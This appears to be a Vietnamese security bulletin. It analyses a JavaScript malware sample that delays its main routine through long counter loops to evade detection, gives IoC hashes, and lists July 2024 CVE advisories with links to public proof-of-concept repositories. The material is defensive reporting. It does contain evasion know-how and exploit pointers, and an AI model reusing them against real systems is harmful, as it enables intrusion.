Mẫu mã độc phát hiện được được đăng tải lên VirusTotal vào đầu tháng 1 với các thông tin như sau:
SHA256 hash: c853d91501111a873a027bd3b9b4dab9dd940e89fcfec51efbb6f0db0ba6687b
File size: 860,920 bytes
File name: what cards are legal in goat format 35435.js
Cấu hình cài đặt Node.js để debug các đoạn mã code js trong Visual Studio Code, nhận thấy mã độc được viết đan xen với các thư viện JavaScript hợp lệ, quá trình debug cũng cho thấy việc mã độc sẽ thực thi sau khi vượt qua nhiều vòng lặp với thời gian được chỉ định, nhằm lẩn tránh sự phát hiện.
Trong hình ảnh trên, xảy ra tình trạng xuất hiện vòng lặp vô hạn do jobcv được gán giá trị bằng 1, oftenfs hoạt động như một counter với giá trị khởi tạo ban đầu là 8242. Vòng lặp sẽ tiếp tục chạy cho đến khi oftenfs có giá trị 2597242, horseq7 sẽ tiếp tục tham chiếu đến hàm có tên sleepy. Theo như môi trường đã thử nghiệm, mất khoảng 10 phút để oftenfs đạt tới giá trị là 2597242
Tiếp tục phân tích là sleepy, tại đây horseq7 được gán một hàm có tên là indicate6, gần giống hàm trước đó, code sẽ được được delays, bên trong hàm indicate6, horseq7 sẽ tiếp tục được gán tới hàm lclft4 như hình ảnh dưới đây:
Sau các quá trình delays, mã độc sẽ nhảy tới hàm course83, nơi thực hiện các chức năng chính của mã độc
Counter Value | Function Name |
2597242 | sleepy |
5210044 | indicate6 |
6001779 | lclft4 |
Indicator of Compromises (IoCs)
442f5adc6277ad17dfbc83bdee1f0d32364c6edb
947539769b8a818530e9790c27084b2850333c29
3 CVE và các khuyến nghị bảo mật
3.1 Microsoft Patch Tuesday – July 2024
Trong tháng 07, Microsoft đã phát hành các bản vá cho 139 CVE mới trong các sản phẩm của Windows và Windows Components; Office và Office Components; .NET và Visual Studio; Azure; Defender for IoT; SQL Server; Windows Hyper-V; Bitlocker và Secure Boot; Remote Desktop; và Xbox. Trong đó có 5 lỗ hổng được đánh giá mức độ Nghiêm trọng, 133 lỗ hổng được đánh giá là Important, 3 lỗ hổng được đánh giá Moderate. Dưới đây là các CVE nổi bật:
3.1.1 CVE-2024-38080– Cảnh báo lỗ hổng leo thang đặc quyền trong Windows Hyper-V Elevation | Windows Hyper-V Elevation of Privilege Vulnerability
CVSS: 7.8/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa với đặc quyền SYSTEM trên hệ thống bị ảnh hưởng. Khai thác lỗ hổng yêu cầu xác thực.
Phiên bản ảnh hưởng:
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64based Systems
Windows 11 Version 23H2 for ARM64based Systems
Windows 11 Version 22H2 for x64based Systems
Windows 11 Version 22H2 for ARM64based Systems
Windows 11 version 21H2 for ARM64based Systems
Windows 11 version 21H2 for x64based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38080
3.1.2 CVE-2024-38112 – Cảnh báo lỗ hổng Spoofing trên Windows MSHTML Platform | Windows MSHTML Platform Spoofing Vulnerability.
CVSS: 7.5/10
Mô tả: Tồn tại lỗ hổng Spoofing trong Windows MSHTML Platform. Khai thác lỗ hổng thành công yêu cầu kẻ tấn công cần chuẩn bị môi trường mục tiêu và có sự tương tác từ người dùng.
Phiên bản ảnh hưởng:
Windows 10 Version 1809 for 32bit Systems
Windows Server 2019
Windows 11 Version 22H2 for x64based Systems
Windows 10 Version 21H2 for x64based Systems
Windows Server 2022
Windows 11 version 21H2 for x64based Systems
Windows 11 version 21H2 for ARM64based Systems
Windows Server 2019 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows 10 Version 21H2 for ARM64based Systems
Windows Server 2012 R2 (Server Core installation)
Windows 10 Version 22H2 for 32bit Systems
Windows 11 Version 23H2 for ARM64based Systems
Windows Server 2012 R2
Windows 10 Version 22H2 for ARM64based Systems
Windows 10 Version 1809 for x64based Systems
Windows Server 2008 for x64based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64based Systems Service Pack 2
Windows Server 2008 for 32bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32bit Systems Service Pack 2
Windows 10 Version 1809 for ARM64based Systems
Windows Server 2016 (Server Core installation)
Windows 10 Version 21H2 for 32bit Systems
Windows Server 2016
Windows 10 Version 1607 for x64based Systems
Windows 10 Version 1607 for 32bit Systems
Windows 10 for x64based Systems
Windows 11 Version 22H2 for ARM64based Systems
Windows 10 for 32bit Systems
Windows 11 Version 23H2 for x64based Systems
Windows 10 Version 22H2 for x64based Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112
3.1.3 CVE-2024-38077 – Cảnh báo lỗ hổng thực thi mã từ xa trong Windows Remote Desktop Licensing Service | Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability.
CVSS: 9.8/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công không cần xác thực thực thi mã từ xa. Khai thác lỗ hổng yêu cầu kết nối với Remote Desktop Licensing Service và gửi các message độc hại.
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38077
3.1.4 CVE-2024-38060 – Cảnh báo lỗ hổng thực thi mã từ xa trên Microsoft Windows Codecs Library | Microsoft Windows Codecs Library Remote Code Execution Vulnerability.
CVSS: 8.8/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên Microsoft Windows Codecs Library. Khai thác lỗ hổng yêu cầu xác thực sau đó upload TIFF file độc hại lên máy chủ. Khai thác lỗ hổng không yêu cầu quyền admin hay các đặc quyền nâng cao khác.
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38060
3.1.5 CVE-2024-38023/CVE-2024-38024 – Cảnh báo lỗ hổng thực thi mã từ xa trên Microsoft SharePoint Server | Microsoft SharePoint Server Remote Code Execution Vulnerability
CVSS: 7.2/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên SharePoint Server. Khai thác lỗ hổng yêu cầu xác thực, kẻ tấn công cần có quyền trong Site Owner từ đó tải các tệp độc hại lên Sharepoint Server và gửi các API request để trigger quá trình deserialization trong file’s parameters.
Phiên bản ảnh hưởng:
Microsoft SharePoint Server Subscription Edition
Microsoft SharePoint Server 2019
Microsoft SharePoint Enterprise Server 2016
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38023
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38024
3.1.6 CVE-2024-38094– Cảnh báo lỗ hổng thực thi mã từ xa trên Microsoft SharePoint | Microsoft SharePoint Remote Code Execution Vulnerability
CVSS: 7.2/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên SharePoint Server. Khai thác lỗ hổng yêu cầu xác thực, kẻ tấn công cần có quyền trong Site Owner.
Phiên bản ảnh hưởng:
Microsoft SharePoint Server Subscription Edition
Microsoft SharePoint Server 2019
Microsoft SharePoint Enterprise Server 2016
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38094
3.2 Ứng Dụng Web Và Các Sản Phẩm Khác
3.2.1 CVE-2024-36991 – Splunk Unauthenticated Path Traversal Modules Messaging
CVSS: 7.5/10
Mô tả: Tồn tại lỗ hổng path traversal ở “/modules/messaging/” endpoint trên Splunk Enterprise Windows các phiên bản dưới 9.2.2, 9.1.5, và 9.0.10 cho phép kẻ tấn công đọc các thông tin nhạy cảm trên hệ thống bị ảnh hưởng.
Phiên bản ảnh hưởng:
Phiên bản dưới 9.2.2, 9.1.5 và 9.0.10
Lưu ý: Lỗ hổng này chỉ ảnh hưởng đến Splunk Enterprise trên Windows
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:.
https://advisory.splunk.com/advisories/SVD-2024-0711
https://docs.splunk.com/Documentation/Splunk/latest/Security/DisableunnecessarySplunkcomponents
3.2.2 CVE-2024-29943 – Out-of-bounds Read or Write Vulnerability.
CVSS: 9.8/10
Mô tả: Tồn tại lỗ hổng out-of-bounds trong Firefox cho phép kẻ tấn công đọc/ghi trên các đối tượng JavaScript, khai thác thành công cho phép thực thi mã từ xa và sandbox escape ảnh hưởng đến Firefox thấp hơn phiên bản 124.0.1.
Lỗ hổng được trình bày trong cuộc thi hacking Pwn2Own Vancouver 2024. Hiện tại, bài phân tích lỗ hổng và mã khai thác đã public trên Internet, chi tiết xem tại:
https://github.com/bjrjk/CVE-2024-29943
Phiên bản ảnh hưởng:
Phiên bản Firefox < 124.0.1
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://www.mozilla.org/en-US/security/advisories/mfsa2024-15/
3.2.3 CVE-2024-6387- OpenSSH Server Remote Unauthenticated Code Execution vulnerability.
CVSS: 8.1/10
Mô tả: Tồn tại lỗ hổng race-condition trong sshd cho phép kẻ tấn công thực thi đoạn mã tùy ý với quyền root. Theo ghi nhận từ mô tả của hãng, lỗ hổng đã được khai thác thành công trên môi trường lab sử dụng hệ điều hành 32-bit Linux/glibc với cơ chế ASLR được bật, khai thác yêu cầu từ 6h đến 8h để thực hiện. Môi trường 64bit được cho là có thể khai thác nhưng chưa được chứng minh, các môi trường khác không phải glibc cũng chưa được kiểm chứng, hệ thống không có cơ chế ASLR được cho là khiến lỗ hổng dễ khai thác hơn và OpenBSD được cho là khó bị khai thác.
Hiện tại, bài phân tích về lỗ hổng và mã khai thác mới được public trên Internet, tuy nhiên chưa thể kiểm chứng và đảm bảo việc hoạt động của mã khai thác.
Thông tin mã khai thác: https://github.com/acrono/cve-2024-6387-poc
Phiên bản ảnh hưởng:
– OpenSSH < 4.4p1 nếu chưa được cập nhật bản vá CVE-2008-4109 và CVE-2006-5051 sẽ bị ảnh hưởng bởi lỗ hổng.
– OpenSSH phiên bản 8.5p1 đến 9.8p1 (8.5p1 <= OpenSSH < 9.8p1) bị ảnh hưởng bởi lỗ hổng.
– OpenSSH phiên bản từ 4.4p1 đến 8.5p1 không bị ảnh hưởng.
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://www.openssh.com/txt/release-9.8
https://www.openssh.com/security.html
https://www.openssh.com/releasenotes.html
https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt
3.2.4 CVE-2024-6235- Cảnh báo lỗ hổng lộ lọt thông tin | Sensitive information disclosure vulnerability
CVSS: 9.4/10
Mô tả: Tồn tại lỗ hổng tiết lộ thông tin ảnh hưởng đến các sản phẩm NetScaler Console do không xử lý đúng cách trong quá trình xác thực cho phép kẻ tấn công có quyền truy cập vào NetScaler Console, đọc hoặc truy cập vào các dữ liệu nhạy cảm.
Phiên bản ảnh hưởng:
NetScaler Console 14.1 trước phiên bản 14.1-25.53
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
3.2.5 CVE-2024-6236- Cảnh báo lỗ hổng từ chối dịch vụ | Denial of Service Vulnerability
CVSS: 7.1/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công từ chối dịch vụ trên hệ thống bị ảnh hưởng. Khai thác lỗ hổng yêu cầu kẻ tấn công có quyền truy cập vào địa chỉ IP của NetScaler Console, NetScaler Agent, NetScaler SDX (SVM).
Phiên bản ảnh hưởng:
NetScaler Console 14.1 phiên bản trước 14.1-25.53
NetScaler Console 13.1 phiên bản trước 13.1-53.22
NetScaler Console 13.0 phiên bản trước 13.0-92.31
NetScaler SDX (SVM) 14.1 phiên bản trước 14.1-25.53
NetScaler SDX (SVM) 13.1 phiên bản trước 13.1-53.17
NetScaler SDX (SVM) 13.0 phiên bản trước 13.0-92.31
NetScaler Agent 14.1 phiên bản trước 14.1-25.53
NetScaler Agent 13.1 phiên bản trước 13.1-53.22
NetScaler Agent 13.0 phiên bản trước 13.0-92.31
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
3.2.6 CVE-2024-22274 – Cảnh báo lỗ hổng thực thi mã từ xa trên VMware vCenter Server | VMware vCenter Server authenticated remote-code execution vulnerability
CVSS: 7.2/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên VMware vCenter Server. Khai thác lỗ hổng yêu cầu xác thực.
Phiên bản ảnh hưởng:
Cloud Foundation (vCenter Server) phiên bản 4.x và 5.x
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24308
3.2.7 CVE-2024-40725- Source Code Disclosure via Handlers Configured with AddType
CVSS: 7.5 /10
Mô tả: Bản vá cập nhật Apache HTTP Server 2.4.61 được hãng phát hành nhằm vá lỗ hổng CVE-2024-39884 – lỗ hổng cho phép tiết lộ các thông tin nhạy cảm như source code. Tuy nhiên, việc cập nhật ở bản vá này chưa được triệt để, kẻ tấn công vẫn có thể khai thác lại một số cấu hình cũ cho phép tiết lộ mã nguồn (source code disclosure).
Phiên bản ảnh hưởng:
Apache HTTP Server phiên bản 2.4.60 đến 2.4.61
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://httpd.apache.org/security/vulnerabilities_24.html
3.2.8 CVE-2024-40898 – SSRF with mod_rewrite on Windows
CVSS: 7.5 /10
Mô tả: Tồn tại lỗ hổng SSRF trong Apache HTTP Server cho phép kẻ tấn công có thể trích xuất và thu thập NTML hashes thông qua các request độc hại.
Phiên bản ảnh hưởng:
Apache HTTP Server phiên bản 2.4.0 đến 2.4.61
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://httpd.apache.org/security/vulnerabilities_24.html